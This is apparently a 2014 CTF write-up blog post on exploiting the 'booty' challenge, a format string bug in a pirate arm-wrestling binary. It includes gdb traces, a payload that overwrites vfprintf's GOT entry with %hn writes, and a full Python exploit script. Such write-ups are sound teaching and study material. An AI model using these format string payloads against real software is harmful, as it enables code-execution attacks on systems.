Tuesday, December 9, 2014

9447 CTF booty: Format String Challenge

Long time since my last blog! Anyways, this time during CTF 9447 I tried to resolve the booty challenge but did not have success on finding the vulnerability during the game. Thanks to barrebas blog I understood where the vulnerability was and then proceeded to complete it.

I am not going to explain how Format String works since it is fully documented everywhere, I highly recommend to read Alex Reece blog about this topic before moving forward.

Introducing the game


When running booty for the first time you are prompt to enter a pirate name for what looks like a Arm Wrestling game:

.-= Pirate Arm Wrestling =-.

Who will become the next PIRATE KING?
If ye want the power and glory for yourself then show your worth!
Face the other challengers in a mighty arm wrestle and prove your right to rule.

What be ye fearsome pirate name?
>

After entering the pirate name, you are prompted with one of three available fight status:

a) Beer Wench is looking exhausted!
b) Beer Wench starts to tense up.
c) Beer Wench begins to flex their muscles.

Where "Beer Wench" is the name of the opponent.

Every time a fight status is displayed you need to select an action to take:

Choose an action, [p]ush  [h]old  [r]est:


If the right actions are selected (push when exhausted, rest when tense up and hold when flexing their muscles) , eventually the pirate will win the game and below message will be displayed:


The game asks the end user to change his pirate name and start again, it also prints a stack address that can be helpful to defeat ASLR if needed:

                                               0xbfaea85f marks the spot of your treasure!

The vulnerability


The format string vulnerability exists in the vfprintf function printing the pirate name entered, there is no format (e.g. %s)  passed as parameter to the function and therefore can be manipulated by the end user:


However, if we try to enter a pirate name with the % character it will be removed by below function:


 But there are two bugs in above function:

a) Only the first percentage sign will be removed from the string entered, therefore if the pirate name is: %AAAA%p it will be changed to: 0AAAA%p. But because of the null char at the beginning, we cannot trigger the vulnerability yet. Here comes the second bug to the rescue.

b) Once we win the game, we have the chance to change the pirate name however, the memcpy function does not clean its buffer before reading the next pirate name and therefore we if we enter a single "B" the new name will end up being BAAAA%p

Let's replicate our assumption explain above, by entering %AAAA%p as the first pirate name and B as the second, and we get below result:


We confirmed our assumption and also at the bottom we can see a leak address 0x8048f40 when printing the pirate name, confirming the format string has been successfully executed.

Redirecting execution flow


From here on everything is fun, we have multiple options to gain code execution, one of the ways to exploit format string is by overwriting a key pointer to redirect the execution flow, for this, we need to gather some requirements:

a) Decide the pointer to overwrite: Always a good pointer candidate to overwrite can be taken from the relocations table where:

"relocations are entries in binaries that are left to be filled in later -- at link time by the toolchain linker or at runtime by the dynamic linker. A relocation in a binary is a descriptor which essentially says "determine the value of X, and put that value into the binary at offset Y"

Although with ASLR enabled, the base address of the functions will be different, the offsets at the relocation tables are always the same and therefore our exploit can be reliable. We can confirm this, let's list the relocations from booty:

#readelf -r booty 

Relocation section '.rel.dyn' at offset 0x3d8 contains 3 entries:
 Offset       Info           Type                              Sym.Value    Sym. Name
0804a0f4  00000706   R_386_GLOB_DAT    00000000      __gmon_start__
0804a1a0  00001105   R_386_COPY              0804a1a0      stdin
0804a1a4  00000f05    R_386_COPY              0804a1a4      stdout

Relocation section '.rel.plt' at offset 0x3f0 contains 14 entries:
 Offset         Info            Type                              Sym.Value  Sym. Name
0804a104    00000107   R_386_JUMP_SLOT   00000000   fflush
0804a108    00000207   R_386_JUMP_SLOT   00000000   memcpy
0804a10c    00000307   R_386_JUMP_SLOT   00000000   fclose
0804a110    00000407   R_386_JUMP_SLOT   00000000   time
0804a114    00000507   R_386_JUMP_SLOT   00000000   _IO_getc
0804a118    00000607   R_386_JUMP_SLOT   00000000   _IO_putc
0804a11c    00000707   R_386_JUMP_SLOT   00000000   __gmon_start__
0804a120    00000807   R_386_JUMP_SLOT   00000000   exit
0804a124    00000907   R_386_JUMP_SLOT   00000000   srand
0804a128    00000a07   R_386_JUMP_SLOT   00000000   __libc_start_main
0804a12c    00000b07   R_386_JUMP_SLOT   00000000   fopen
0804a130    00000c07   R_386_JUMP_SLOT   00000000   strncpy
0804a134    00000d07   R_386_JUMP_SLOT   00000000   rand
0804a138    00000e07   R_386_JUMP_SLOT   00000000   vfprintf

The Offsets are listed on the first column, let's focus on the last row related to vfprintf function, at offset 0x0804a138 there will be a pointer to vfprintf function which will be calculated at link or run time, below we can see that by running booty two times the offset contains two different pointers:

gdb$ x/x 0x0804a138
0x804a138: 0xb7614c10

gdb$ x/x 0x804a138
0x804a138: 0xb75c2c10

What we are going to do is to change the pointer at this offset 0x0804a138 so that as soon as vfprintf is called it will point to our desired address!!!

b) Now that we found the pointer to overwrite, now we need to decide where do we want to redirect the execution flow?  At offset 0x080487C0 we can see a function that opens a flag file  and prints its content out to the screen, this function cannot be reached directly by the program though, so we will force booty to jump here:


c) We have the relocation offset to manipulate, the destination address to redirect the flow but how do we actually fulfill this? I highly encourage you to read this excellent blog for detailed steps.

Overwritten relocation offset


First we need to place the address to be overwritten in the stack and calculate the argument number so that we can control it via %$hn later.

As explained in the Introducing the game section, in order to bypass the filter, we need to insert the first name as:

                                              "%\xa1\x04\x08\x38\xa1\x04\x08"

Assuming the first % will be changed to 0, once we win the game and are prompted to change the name, we entered: 0x3a giving us a final name as:

                                             "\x3a\xa1\x04\x08\x38\xa1\x04\x08"

We are sending (in little endian format) the higher two bytes 0x0804a138 and lower two bytes 0x0804a13a to be overwritten later.

In order to test it,  you can run booty via socat as usual:

# socat tcp-listen:4444,fork exec:./booty

Then execute the exploit which must have a raw_input() instruction to give us a chance to attached gdb (full exploit at the end): #./exploit_booty.py

And finally in another window we run:

# ps -fea |grep booty
root      5021  2335  0 Dec08 pts/1    00:00:00 socat tcp-listen:4444,fork exec:./booty
root      6022  3313  0 Dec08 pts/3    00:00:01 vi exploit_booty.py
root      6942  3251  0 04:46 pts/2    00:00:00 /usr/bin/python ./exploit_booty.py
root      6943  5021  0 04:46 pts/1    00:00:00 socat tcp-listen:4444,fork exec:./booty
root      6944  6943  0 04:46 pts/1    00:00:00 ./booty

# gdb attach 6944

Before letting gdb to continue, let's set a breakpoint right before triggering the format string vuln at:

gdb$ br *0x08048a30
Breakpoint 1 at 0x8048a30

We let it run two times so that the two names can be entered:

gdb$ continue
gdb$ continue

Once the breakpoint is hit we print the stack content:

=> 0x8048a30: call   0x8048770
   0x8048a35:         mov    DWORD PTR [esp],0x80499e3
   0x8048a3c:         call   0x8048770
   0x8048a41:         pop    ecx
   0x8048a42:         pop    esi
   0x8048a43:         lea    esi,[esp+0x17]
   0x8048a47:         push   esi
   0x8048a48:         push   0x804957c
--------------------------------------------------------------------------------

Breakpoint 1, 0x08048a30 in ?? ()
gdb$ x/64x $esp
0xbfa1ed30: 0xbfa1eda8 0x08048f40 0xbfa1ee58 0x08048796
0xbfa1ed40: 0xb76e24e0 0x080496e8 0xbfa1ed64 0x00a1eda0
0xbfa1ed50: 0xbfa1eda0 0x00000001 0xbfa1ede8 0x08048e51
0xbfa1ed60: 0xbfa1eda0 0x00000001 0xbfa1ee58 0x08048796
0xbfa1ed70: 0xb76e24e0 0x080499de 0xbfa1ed94 0x70a1ed88
0xbfa1ed80: 0xb75bce84 0xbfa1eda0 0x55555556 0x08048679
0xbfa1ed90: 0xbfa1eda0 0xbfa1ede8 0x08049ad0 0x00000000
0xbfa1eda0: 0x00000033 0x00000000 0x0804a13a 0x0804a138

If you do the math and count all the dwords in the stack skipping the first one since it is the return address, you will realize that the two addresses entered belong to the arguments 30th 0x0804a13a and 31st 0x0804a138.

Then the next step is to confirm we can change its content, so, if you remember we were planning at point b) above to filled this offset with the address: 0x080487C0, since we are going to overwrite only two bytes at a time we will split the target address into:

0804 = 2052 decimal
87C0 -> 0x87C0 -2052 = 32700 decimal

Here is where the specifier %n comes into play, below its man page definition:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Let's see a practical example of %n:


#include

int main()
{
  int val;
  printf("count this %n this does not count\n", &val);
  printf("val = %d\n", val);
  return 0;
}

# ./n
count this  this does not count
val = 11

What we just learned is that the specifier %n will stored at a provided address the number of characters written so far, that is the reason the string "this does not count" was not added to the final count. Also, we can manipulate argument number to use by %n which is the address to store the final count by using the dollar sign: $n, and last but not least we can also tell %n to only write the higher two bytes by using hn modifier. 

With all this features learned, we can come up with a request to overwrite the higher two bytes at address 0x0804a13a with 0x0804 assuming the target address is located at the argument 30th:


                                \x3a\xa1\x04\x08" + "%2048x%30$hn
              
  Where:
\x3a\xa1\x04\x08  = Is the higher two bytes of the target address 
%2048x                = As mentioned above, we are trying to write 0x0804 = 2052 so 2048 + 4 bytes of the address give us the required amount to pass to %n
%30$hn                = We tell specifier n to uset the 30th argument (which points to the target address in the stack) and only write the higher two bytes.  

Let's test what we just learned by sending to booty the pirate name:

                                   "%\xa1\x04\x08" + "%2048x%30$hn"

And "\x3a" as the new name once we win the game.

Again we set a breakpoint at 0x08048a30 and once we hit the breakpoint we step into the function to trigger the vulnerability, before executing vfprintf call we print the value of our higher two bytes of the target address:

Before:

=> 0x8048785: call   0x8048570
      0x804878a: pop    eax
      0x804878b: push   DWORD PTR ds:0x804a1a4
      0x8048791: call   0x80484a0
      0x8048796: add    esp,0x1c
      0x8048799: ret    
      0x804879a: lea    esi,[esi+0x0]
      0x80487a0: sub    esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x0000b75d
gdb$ 

Then we proceed to execute the vfprintf and print the content after:

=> 0x804878a: pop    eax
     0x804878b: push   DWORD PTR ds:0x804a1a4
     0x8048791: call   0x80484a0
     0x8048796: add    esp,0x1c
     0x8048799: ret    
     0x804879a: lea    esi,[esi+0x0]
     0x80487a0: sub    esp,0x14
     0x80487a3: push   0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a13a
0x804a13a: 0x00000804
gdb$ 

                     
Voila!!! We can see that we have successfully changed the higher two bytes of the target address. The final step is to made the math for the lower two bytes remaining of the target address located at 0x0804a138 which is the 31st argument as we learned before, so the final pirate string name will be:

                   "%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"

Two important changes to point out with respect to the previous request, here we are using the two higher and lower bytes of the target address and therefore 8 bytes are sent before the $hn parameter which lowers the size sent before from 2048 to 2044 to keep the final size of 2052, we can see that the second size is equal to 32700 why? Remember that the bytes to overwrite are: 0x87C0 

By doing the math, we already sent 2052 bytes before the second $hn so 0x87C0 - 2052 give us the remaining size equal to 32700.

Finally, by running the final exploit we can see that right after triggering the format string we have successfully overwritten the original pointer to vfprint to 0x080487C0 which is where the flag is printed out:

gdb$ x/x 0x0804a138
0x804a138: 0xb75ddc10   Before triggering the vulnerability
gdb$ ni
--------------------------------------------------------------------------[code]
=> 0x804878a: pop    eax
     0x804878b: push   DWORD PTR ds:0x804a1a4
     0x8048791: call   0x80484a0
     0x8048796: add    esp,0x1c
     0x8048799: ret    
     0x804879a: lea    esi,[esi+0x0]
     0x80487a0: sub    esp,0x14
     0x80487a3: push   0x8048f40
--------------------------------------------------------------------------------
0x0804878a in ?? ()
gdb$ x/x 0x0804a138
0x804a138: 0x080487c0     Relocation offset overwritten
gdb$ 

So, if we keep stepping into the code as soon as a vfprintf call is made it will jump to our desired place:

gdb$ 
--------------------------------------------------------------------------[code]
=> 0x8048785: call   0x8048570 <vfprintf@plt>  Redirecting the flow here!!!
     0x804878a: pop    eax
     0x804878b: push   DWORD PTR ds:0x804a1a4
     0x8048791: call   0x80484a0
     0x8048796: add    esp,0x1c
     0x8048799: ret    
     0x804879a: lea    esi,[esi+0x0]
     0x80487a0: sub    esp,0x14
--------------------------------------------------------------------------------
0x08048785 in ?? ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x8048570 : jmp    DWORD PTR ds:0x804a138
     0x8048576 : push   0x68
     0x804857b : jmp    0x8048490
     0x8048580: lea    ecx,[esp+0x4]
     0x8048584: and    esp,0xfffffff0
     0x8048587: xor    eax,eax
     0x8048589: push   DWORD PTR [ecx-0x4]
     0x804858c: push   ebp
--------------------------------------------------------------------------------
0x08048570 in vfprintf@plt ()
gdb$ si
--------------------------------------------------------------------------[code]
=> 0x80487c0: push   ebx
     0x80487c1: sub    esp,0x10
     0x80487c4: push   0x8049a60
     0x80487c9: push   0x8049861
     0x80487ce: call   0x8048540  Open FLAG!!!
     0x80487d3: add    esp,0x10
     0x80487d6: test   eax,eax
     0x80487d8: mov    ebx,eax
--------------------------------------------------------------------------------
0x080487c0 in ?? ()
gdb$ 

Hope you enjoy it!

Exploit source code:

#!/usr/bin/python
#Author: Danux Mitnick
#Date: Dec 5 2014

from socket import *
from time import sleep

s=socket(AF_INET, SOCK_STREAM)
s.connect(('localhost', 4444))

#Attach gdb here.
raw_input()

print s.recv(1024)
sleep(0.01)

cmd ="%\xa1\x04\x08\x38\xa1\x04\x08" + "%2044x%30$hn%32700x%31$hn"; #Overwritting vsprintf
s.send(cmd+"\n")
cont = 0

while 1:
  sleep(0.01)

  data = s.recv(1024)

  print data

  if "LEVEL" in data:
      cmd = "h\n"
  if "exhausted" in data:
      cmd = "p\n"
  if "flex" in data:
      cmd = "h\n"
  if "tense" in data:
      cmd = "r\n"

  if "again" in data:
      cmd = "y\n"
  if "name" in data:
      cmd = "\x3a\n" 

  if ">" in data:
      if cmd:
          s.send(cmd)
          cmd = ""
s.close()